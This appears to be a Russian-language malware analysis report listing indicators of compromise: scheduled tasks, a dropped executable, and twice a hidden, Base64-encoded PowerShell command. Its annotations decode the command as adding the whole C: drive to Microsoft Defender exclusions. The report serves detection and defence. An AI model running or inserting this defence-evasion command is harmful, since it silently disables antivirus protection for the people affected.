Техническая информация
- <SYSTEM32>\tasks\fiorj
- <SYSTEM32>\tasks\lsstdd
- %LOCALAPPDATA%\xhcufjy\fiorj.exe
- <SYSTEM32>\tasks\lsstdd
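- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA== (со скрытым окном; аргумент -enc — это Base64 от строки в UTF-16LE «Set-MpPreference -ExclusionPath C:\», то есть команда добавляет весь диск C:\ в исключения проверки Microsoft Defender)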
- '<SYSTEM32>\taskeng.exe' {1D054F97-4F18-4607-ABCB-DF266726543A} S-1-5-21-1960123792-2022915161-3775307078-1001:cecbzfqhv\user:S4U
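- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA== (после декодирования Base64/UTF-16LE: «Set-MpPreference -ExclusionPath C:\» — добавление диска C:\ в исключения Microsoft Defender)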